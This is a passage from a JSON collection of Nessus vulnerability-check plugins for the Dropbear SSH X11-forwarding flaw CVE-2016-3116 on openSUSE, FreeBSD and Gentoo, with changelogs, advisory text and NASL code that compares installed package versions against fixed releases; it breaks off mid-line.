- Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - 
dropbear was updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. 
Found\n by afl-fuzz\n\n - dropbear was updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - dropbear was updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie\n\n - dropbear was updated to upstream version 2014.65\n\n - Fix 2014.64 regression, server session hang on exit with\n scp (and probably others), thanks to NiLuJe for tracking\n it down\n\n - Fix 2014.64 regression, clock_gettime() error handling\n which broke on older Linux kernels, reported by NiLuJe\n\n - Fix 2014.64 regression, writev() could occassionally\n fail with EAGAIN which wasn't caught\n\n - Avoid error message when trying to set QoS on\n 
proxycommand or multihop pipes\n\n - Use /usr/bin/xauth, thanks to Mike Frysinger\n\n - Don't exit the client if the local user entry can't be\n found, thanks to iquaba\n\n - added missing systemd entries for\n dropbear-keygen.service\n\n - dropbear was updated to upstream version 2014.64\n\n - Fix compiling with ECDSA and DSS disabled\n\n - Don't exit abruptly if too many outgoing packets are\n queued for writev(). Patch thanks to Ronny Meeus\n\n - The -K keepalive option now behaves more like OpenSSH's\n 'ServerAliveInterval'. If no response is received after\n 3 keepalives then the session is terminated. This will\n close connections faster than waiting for a TCP timeout.\n\n - Rework TCP priority setting. New settings are if\n (connecting || ptys || x11) tos = LOWDELAY else if\n (tcp_forwards) tos = 0 else tos = BULK Thanks to Catalin\n Patulea for the suggestion.\n\n - Improve handling of many concurrent new TCP forwarded\n connections, should now be able to handle as many as\n MAX_CHANNELS. Thanks to Eduardo Silva for reporting and\n investigating it.\n\n - Make sure that exit messages from the client are\n printed, regression in 2013.57\n\n - Use monotonic clock where available, timeouts won't be\n affected by system time changes\n\n - Add -V for version\n\n - dropbear was updated regular init script to also create\n ECDSA keys\n\n - update to upstream version 2014.63\n\n - Fix ~. to terminate a client interactive session after\n waking a laptop from sleep.\n\n - Changed port separator syntax again, now using\n host^port. This is because IPv6 link-local addresses use\n %. 
Reported by Gui Iribarren\n\n - Avoid constantly relinking dropbearmulti target, fix\n 'make install' for multi target, thanks to Mike\n Frysinger\n\n - Avoid getting stuck in a loop writing huge key files,\n reported by Bruno Thomsen\n\n - Don't link dropbearkey or dropbearconvert to libz or\n libutil, thanks to Nicolas Boos\n\n - Fix linking -lcrypt on systems without /usr/lib, thanks\n to Nicolas Boos\n\n - Avoid crash on exit due to cleaned up keys before last\n packets are sent, debugged by Ronald Wahl\n\n - Fix a race condition in rekeying where Dropbear would\n exit if it received a still-in-flight packet after\n initiating rekeying. Reported by Oliver Metz. This is a\n longstanding bug but is triggered more easily since\n 2013.57\n\n - [...]\n\n - dropbear was updated service files and activated\n building of ecdsa keys\n\n - only package the old init service in distributions\n without systemd\n\n - imported upstream version 2013.62\n\n - Disable 'interactive' QoS connection options when a\n connection doesn't have a PTY (eg scp, rsync). Thanks to\n Catalin Patulea for the patch.\n\n - Log when a hostkey is generated with -R, fix some bugs\n in handling server hostkey commandline options\n\n - Fix crash in Dropbearconvert and 521 bit key, reported\n by NiLuJe\n\n - Update config.guess and config.sub again\n\n - ECC (elliptic curve) support. Supports ECDSA hostkeys\n (requires new keys to be generated) and ECDH for setting\n up encryption keys (no intervention required). This is\n significantly faster.\n\n - curve25519-sha256@libssh.org support for setting up\n encryption keys. This is another elliptic curve mode\n with less potential of NSA interference in algorithm\n parameters. curve25519-donna code thanks to Adam Langley\n\n - -R option to automatically generate hostkeys. 
This is\n recommended for embedded platforms since it allows the\n system random number device /dev/urandom a longer\n startup time to generate a secure seed before the\n hostkey is required.\n\n - Compile fixes for old vendor compilers like Tru64 from\n Daniel Richard G.\n\n - Make authorized_keys handling more robust, don't exit\n encountering malformed lines. Thanks to Lorin Hochstein\n and Mark Stillwell", "edition": 19, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-25T00:00:00", "title": "openSUSE Security Update : dropbear (openSUSE-2016-393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dropbear-debugsource", "p-cpe:/a:novell:opensuse:dropbear", "p-cpe:/a:novell:opensuse:dropbear-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-393.NASL", "href": "https://www.tenable.com/plugins/nessus/90168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-393.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90168);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"openSUSE Security Update : dropbear (openSUSE-2016-393)\");\n script_summary(english:\"Check for the openSUSE-2016-393 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for dropbear fixes the following issues :\n\n - dropbear was updated to upstream version 2016.72\n\n - Validate X11 forwarding input. 
Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - dropbear was updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - dropbear was updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - dropbear was updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some 
platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - dropbear was updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. 
AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - dropbear was updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie\n\n - dropbear was updated to upstream version 2014.65\n\n - Fix 2014.64 regression, server session hang on exit with\n scp (and probably others), thanks to NiLuJe for tracking\n it down\n\n - Fix 2014.64 regression, clock_gettime() error handling\n which broke on older Linux kernels, reported by NiLuJe\n\n - Fix 2014.64 regression, writev() could occassionally\n fail with EAGAIN which wasn't caught\n\n - Avoid error message when trying to set QoS on\n proxycommand or multihop pipes\n\n - Use /usr/bin/xauth, thanks to Mike Frysinger\n\n - Don't exit the client if the local user entry can't be\n found, thanks to iquaba\n\n - added missing systemd entries for\n dropbear-keygen.service\n\n - dropbear was updated to upstream version 2014.64\n\n - Fix compiling with ECDSA and DSS disabled\n\n - Don't exit abruptly if too many outgoing packets are\n queued for writev(). 
Patch thanks to Ronny Meeus\n\n - The -K keepalive option now behaves more like OpenSSH's\n 'ServerAliveInterval'. If no response is received after\n 3 keepalives then the session is terminated. This will\n close connections faster than waiting for a TCP timeout.\n\n - Rework TCP priority setting. New settings are if\n (connecting || ptys || x11) tos = LOWDELAY else if\n (tcp_forwards) tos = 0 else tos = BULK Thanks to Catalin\n Patulea for the suggestion.\n\n - Improve handling of many concurrent new TCP forwarded\n connections, should now be able to handle as many as\n MAX_CHANNELS. Thanks to Eduardo Silva for reporting and\n investigating it.\n\n - Make sure that exit messages from the client are\n printed, regression in 2013.57\n\n - Use monotonic clock where available, timeouts won't be\n affected by system time changes\n\n - Add -V for version\n\n - dropbear was updated regular init script to also create\n ECDSA keys\n\n - update to upstream version 2014.63\n\n - Fix ~. to terminate a client interactive session after\n waking a laptop from sleep.\n\n - Changed port separator syntax again, now using\n host^port. This is because IPv6 link-local addresses use\n %. Reported by Gui Iribarren\n\n - Avoid constantly relinking dropbearmulti target, fix\n 'make install' for multi target, thanks to Mike\n Frysinger\n\n - Avoid getting stuck in a loop writing huge key files,\n reported by Bruno Thomsen\n\n - Don't link dropbearkey or dropbearconvert to libz or\n libutil, thanks to Nicolas Boos\n\n - Fix linking -lcrypt on systems without /usr/lib, thanks\n to Nicolas Boos\n\n - Avoid crash on exit due to cleaned up keys before last\n packets are sent, debugged by Ronald Wahl\n\n - Fix a race condition in rekeying where Dropbear would\n exit if it received a still-in-flight packet after\n initiating rekeying. Reported by Oliver Metz. 
This is a\n longstanding bug but is triggered more easily since\n 2013.57\n\n - [...]\n\n - dropbear was updated service files and activated\n building of ecdsa keys\n\n - only package the old init service in distributions\n without systemd\n\n - imported upstream version 2013.62\n\n - Disable 'interactive' QoS connection options when a\n connection doesn't have a PTY (eg scp, rsync). Thanks to\n Catalin Patulea for the patch.\n\n - Log when a hostkey is generated with -R, fix some bugs\n in handling server hostkey commandline options\n\n - Fix crash in Dropbearconvert and 521 bit key, reported\n by NiLuJe\n\n - Update config.guess and config.sub again\n\n - ECC (elliptic curve) support. Supports ECDSA hostkeys\n (requires new keys to be generated) and ECDH for setting\n up encryption keys (no intervention required). This is\n significantly faster.\n\n - curve25519-sha256@libssh.org support for setting up\n encryption keys. This is another elliptic curve mode\n with less potential of NSA interference in algorithm\n parameters. curve25519-donna code thanks to Adam Langley\n\n - -R option to automatically generate hostkeys. This is\n recommended for embedded platforms since it allows the\n system random number device /dev/urandom a longer\n startup time to generate a secure seed before the\n hostkey is required.\n\n - Compile fixes for old vendor compilers like Tru64 from\n Daniel Richard G.\n\n - Make authorized_keys handling more robust, don't exit\n encountering malformed lines. 
Thanks to Lorin Hochstein\n and Mark Stillwell\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/robotframework/SSHLibrary/issues/128\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"dropbear-2016.72-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"dropbear-debuginfo-2016.72-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"dropbear-debugsource-2016.72-2.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear / dropbear-debuginfo / dropbear-debugsource\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T10:55:09", "description": "Matt Johnson reports :\n\nValidate X11 forwarding input. 
Could allow bypass of authorized_keys\ncommand= restrictions", "edition": 25, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-15T00:00:00", "title": "FreeBSD : dropbear -- authorized_keys command= bypass (8eb78cdc-e9ec-11e5-85be-14dae9d210b8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:dropbear"], "id": "FREEBSD_PKG_8EB78CDCE9EC11E585BE14DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/89928", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89928);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"FreeBSD : dropbear -- authorized_keys command= bypass (8eb78cdc-e9ec-11e5-85be-14dae9d210b8)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matt Johnson reports :\n\nValidate X11 forwarding input. 
Could allow bypass of authorized_keys\ncommand= restrictions\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://matt.ucc.asn.au/dropbear/CHANGES\"\n );\n # https://vuxml.freebsd.org/freebsd/8eb78cdc-e9ec-11e5-85be-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44a85a33\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"dropbear<2016.72\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T11:05:16", "description": "The remote host is affected by the vulnerability described in GLSA-201607-08\n(Dropbear: Privilege escalation)\n\n A CRLF injection vulnerability in Dropbear SSH allows remote\n authenticated users to bypass intended shell-command restrictions via\n crafted X11 forwarding data.\n \nImpact :\n\n A remote authenticated user could execute arbitrary code with the\n privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-07-21T00:00:00", "title": "GLSA-201607-08 : Dropbear: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-07-21T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:dropbear"], "id": "GENTOO_GLSA-201607-08.NASL", "href": "https://www.tenable.com/plugins/nessus/92478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks 
in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201607-08.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92478);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"GLSA\", value:\"201607-08\");\n\n script_name(english:\"GLSA-201607-08 : Dropbear: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201607-08\n(Dropbear: Privilege escalation)\n\n A CRLF injection vulnerability in Dropbear SSH allows remote\n authenticated users to bypass intended shell-command restrictions via\n crafted X11 forwarding data.\n \nImpact :\n\n A remote authenticated user could execute arbitrary code with the\n privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201607-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Dropbear users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dropbear-2016.73'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/dropbear\", unaffected:make_list(\"ge 2016.73\"), vulnerable:make_list(\"lt 